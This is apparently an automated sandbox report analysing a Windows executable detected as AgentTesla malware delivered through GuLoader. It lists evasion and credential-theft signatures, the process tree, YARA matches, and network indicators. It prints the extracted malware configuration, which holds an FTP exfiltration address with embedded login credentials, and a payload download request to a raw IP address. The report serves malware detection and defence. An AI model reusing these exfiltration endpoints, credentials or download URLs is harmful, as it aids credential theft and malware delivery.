Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6culQoI97a.exe

Overview

General Information

Sample Name:6culQoI97a.exe
Analysis ID:755473
MD5:d9aa122b8c39444799e60eabbab69502
SHA1:0175baf7a240c2050571a6df273a892e8b192d81
SHA256:317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • 6culQoI97a.exe (PID: 9084 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: D9AA122B8C39444799E60EABBAB69502)
    • CasPol.exe (PID: 2424 cmdline: C:\Users\user\Desktop\6culQoI97a.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
SourceRuleDescriptionAuthorStrings
00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
          • 0x30f14:$s10: logins
          • 0x46998:$s10: logins
          • 0x4fe48:$s11: credential
          • 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
          • 0x2346:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B
          • 0x2892:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
          Click to see the 3 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 6culQoI97a.exeReversingLabs: Detection: 73%
          Source: 6culQoI97a.exeVirustotal: Detection: 56%Perma Link
          Source: ftp://ftp.gettoner.com.mx/droidAvira URL Cloud: Label: malware
          Source: http://195.178.120.24/mhpgXW188.chmAvira URL Cloud: Label: malware
          Source: 6culQoI97a.exe.9084.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
          Source: 6culQoI97a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 6culQoI97a.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_00406448 FindFirstFileA,FindClose,2_2_00406448
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_0040589C
          Source: C:\Users\user\Desktop\6culQoI97a.exeCode function: 2_2_004027A1 FindFirstFileA,2_2_004027A1
          Source: Joe Sandbox ViewIP Address: 195.178.120.24 195.178.120.24
          Source: global trafficHTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.178.120.24Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: unknownTCP traffic detected without corresponding DNS query: 195.178.120.24
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.gettoner.com.mx/droid
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000009.00000002.5786454694.0000000001396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://195.178.120.24/mhpgXW188.chm
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://NwSpLV.com
          Source: 6culQoI97a.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 6culQoI97a.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: global trafficHTTP traffic detected: GET /mhpgXW188.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 195.178.120.24Cache-Control: no-cache